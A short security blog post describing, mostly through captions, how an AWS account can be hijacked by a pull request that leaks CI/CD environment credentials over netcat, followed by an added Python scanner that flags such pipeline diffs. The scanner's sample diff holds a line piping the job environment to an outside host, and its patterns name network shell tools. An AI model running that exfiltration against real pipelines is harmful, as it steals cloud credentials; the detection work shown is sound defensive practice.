AWS Account Hijacking via CI/CD

Jul 27, 2023


In the evolving landscape of cloud computing, AWS (Amazon Web Services) stands out as a leading service provider. However, as with any digital frontier, it is not without potential vulnerabilities. One of the emerging threats organizations face today lies in CI/CD security. In this short blog post I will show how an AWS account can be hijacked via CI/CD.

IAM Configuration


External provider — ENV via NC

Start listener — grep for AWS

Push changes

Make PR

Job execution

Account Hijacked :)
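
A defensive check for the flow captioned above, as an added example that is not from the original post: a Python scan of a pull request's unified diff that flags added pipeline lines which both read the job environment and call a network tool. The file-name patterns, command lists, function name and sample diff are assumptions constructed for illustration.

```python
import re

# Heuristic lists (assumed; extend for your CI system). A hit is a review flag, not a verdict.
ENV_READ = re.compile(r"(?<![\w./-])(env|printenv|export\s+-p)(?![\w./-])|\$\{?AWS_[A-Z_]+")
NET_SINK = re.compile(r"(?<![\w./-])(nc|ncat|netcat|curl|wget|socat)(?![\w-])|/dev/tcp/")
# Files that define what the CI job executes. Scripts those files call are not
# covered here and would need their own patterns.
PIPELINE_FILE = re.compile(
    r"(^|/)(\.github/workflows/.+\.ya?ml|\.gitlab-ci\.yml|buildspec\.ya?ml|Jenkinsfile)$")
HUNK = re.compile(r"^@@ -\d+(?:,\d+)? \+(\d+)")

def scan_diff(diff_text):
    """Return (path, new_line_number, text) for every added pipeline line that
    both reads the environment and reaches the network."""
    findings, path, lineno = [], None, 0
    for raw in diff_text.splitlines():
        if raw.startswith("+++ "):              # new-file header: remember the path
            path = raw[6:] if raw.startswith("+++ b/") else raw[4:]
            continue
        hunk = HUNK.match(raw)
        if hunk:                                # hunk header: reset new-file line counter
            lineno = int(hunk.group(1)) - 1
            continue
        if raw.startswith("-"):                 # removed lines do not exist in the new file
            continue
        lineno += 1
        if (raw.startswith("+") and path and PIPELINE_FILE.search(path)
                and ENV_READ.search(raw) and NET_SINK.search(raw)):
            findings.append((path, lineno, raw[1:].strip()))
    return findings

# Constructed sample: a PR that adds one step to a workflow file.
# 203.0.113.10 is a documentation-range address, not a real host.
SAMPLE_DIFF = """\
diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -10,3 +10,4 @@ jobs:
     steps:
       - uses: actions/checkout@v4
       - run: make test
+      - run: env | nc 203.0.113.10 4444
"""

if __name__ == "__main__":
    for path, lineno, text in scan_diff(SAMPLE_DIFF):
        print(f"{path}:{lineno}: environment sent to network: {text}")
```

Run as a required status check that does not itself execute the pull request's code, so the flag is raised before the job with AWS credentials starts.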

You may download the PDF Presentation here.

See the full version in the awesome video posted on the John Hammond channel.




MSc in Cyber Security, OSCP, eWPTXv2, CEH Master. Awarded by Apple, Trello, Paysera.